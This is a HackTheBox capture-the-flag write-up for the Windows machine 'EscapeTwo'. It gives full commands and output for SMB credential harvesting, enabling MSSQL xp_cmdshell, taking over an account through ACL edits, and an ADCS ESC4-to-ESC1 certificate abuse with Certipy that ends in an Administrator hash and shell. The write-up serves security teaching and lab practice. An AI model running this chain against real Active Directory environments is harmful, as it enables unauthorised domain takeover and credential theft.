~/writeups/EscapeTwo
Easy Windows ADCS
EscapeTwo.
Medium Windows ADCS ESC4 ESC1 MSSQL HackTheBox
Windows Active Directory machine centered around ADCS abuse. Starting with provided credentials, the path goes through SMB enumeration, MSSQL credential harvesting, and privilege escalation via an ESC4 → ESC1 attack chain to obtain a certificate as Administrator.
User Flag
c000416623xxxxxxxxxxxxxxxxxxxxxx
Root Flag
d3a61f5a28xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance

Full port scan — classic AD DC profile. MSSQL on 1433 is uncommon on DCs and usually means credentials are stored somewhere.

nmap
$ nmap -sC -sV -oA scans/escapeTwo 10.129.232.128 PORT STATE SERVICE VERSION 53/tcp open domain DNS 88/tcp open kerberos-sec Kerberos 135/tcp open msrpc 445/tcp open microsoft-ds SMB 1433/tcp open ms-sql-s MSSQL 3268/tcp open ldap LDAP (Global Catalog) 5985/tcp open wsman WinRM 9389/tcp open mc-nmf AD Web Services
02Foothold — SMB → MSSQL

Starting credentials were provided: rose:KxEPkKe6R8su. Enumerate SMB shares first.

SMB enumeration
$ netexec smb 10.129.232.128 -u rose -p 'KxEPkKe6R8su' --shares SHARE: Accounting Department READ $ smbclient '//10.129.232.128/Accounting Department' -U 'rose%KxEPkKe6R8su' smb: \> get accounts.xlsx smb: \> get corporate.xlsx
finding: spreadsheets contain employee account listings — including sa (SQL Server) credentials.

Connect to MSSQL with the extracted sa credentials and enable command execution.

MSSQL — xp_cmdshell
$ impacket-mssqlclient sequel.htb/sa:'REGGIE1234ronnie'@10.129.232.128 SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; SQL> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; SQL> EXEC xp_cmdshell 'whoami'; sequel\sql_svc
creds found: enumerate config files and registry via xp_cmdshell → surface ryan : WqSZAF6CysDQbGb3
03Lateral Movement — WinRM as ryan

Ryan's credentials work over WinRM. User flag is on the desktop.

evil-winrm
$ evil-winrm -i 10.129.232.128 -u ryan -p 'WqSZAF6CysDQbGb3' *Evil-WinRM* PS C:\Users\ryan\Desktop> type user.txt HTB{...}
04Privilege Escalation — ADCS ESC4 → ESC1

Enumerate vulnerable certificate templates with Certipy.

certipy — find vulnerable templates
$ certipy-ad find -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -dc-ip 10.129.232.128 -vulnerable -stdout Template: DunderMifflinAuthentication ESC4 — ryan has write permissions on template object SubjectAltRequireDns: True (blocks direct ESC1 — must modify template first)
ESC4 alone isn't the end — it's the primitive that enables ESC1. The actual exploit is: write template → request cert → authenticate.

Step 1 — Take control of ca_svc (the account with enrollment rights on the template). Ryan has GenericWrite over it.

owneredit + dacledit + password reset
$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3' $ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3' $ net rpc password "ca_svc" "newP@ssword" -U "sequel.htb"/"ryan"%"WqSZAF6CysDQbGb3" -S 10.129.232.128

Step 2 — Backup then overwrite the template with ESC1 conditions

certipy — ESC4 abuse
# backup original template $ certipy-ad template -u 'ca_svc@sequel.htb' -p 'newP@ssword' -template DunderMifflinAuthentication -dc-ip 10.129.232.128 -save-configuration DunderMifflinAuthentication.json.bak # write ESC1-vulnerable config (sets CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) $ certipy-ad template -u 'ca_svc@sequel.htb' -p 'newP@ssword' -template DunderMifflinAuthentication -dc-ip 10.129.232.128 -write-default-configuration Template now: Enrollee Supplies Subject: True → ESC1 flagged

Step 3 — Request a certificate as Administrator, authenticate, get the hash

certipy req + auth → NT hash
$ certipy-ad req -u 'ca_svc@sequel.htb' -p 'newP@ssword' -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator@sequel.htb -dc-ip 10.129.232.128 [*] Got certificate with UPN 'administrator@sequel.htb' [*] Saved to 'administrator.pfx' $ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.129.232.128 [*] Got hash for 'administrator@sequel.htb': aad3b435b51404ee...:7a8d4e00f75e5a0b3ff...
shell as Administrator
$ evil-winrm -i 10.129.232.128 -u administrator -H '7a8d4e00f75e5a0b3ff...' *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt d3a61f5a28xxxxxxxxxxxxxxxxxxxxxx

Step 4 — Restore the template

certipy — restore template
$ certipy-ad template -u 'ca_svc@sequel.htb' -p 'newP@ssword' -template DunderMifflinAuthentication -dc-ip 10.129.232.128 -write-configuration DunderMifflinAuthentication.json.bak -force
good habit: always restore modified templates post-exploitation. In a real engagement this is critical; on HTB the machine resets anyway.
05Attack Chain Summary
full chain
rose:KxEPkKe6R8su (given) │ ▼ SMB → accounts.xlsx → sa credentials │ ▼ MSSQL xp_cmdshell → sql_svc → ryan credentials │ ▼ WinRM as ryanuser.txt ✓ │ ▼ ryan GenericWrite → ca_svc owneredit + dacledit + password reset │ ▼ ca_svc write perms on DunderMifflinAuthentication (ESC4) write-default-configuration → introduces ESC1 │ ▼ certipy req -upn administrator@sequel.htb → administrator.pfx │ ▼ certipy auth → NT hash → evil-winrm → root.txt ✓
key takeaways:
· ESC4 gives template write access — the actual exploit is the write → request → auth chain into ESC1
· certipy-ad template -write-default-configuration is the clean v5 way to push ESC1 conditions
· CERTSRV_E_SUBJECT_DNS_REQUIRED is a template-level flag, not CA-level — fix it by modifying the template
← all writeups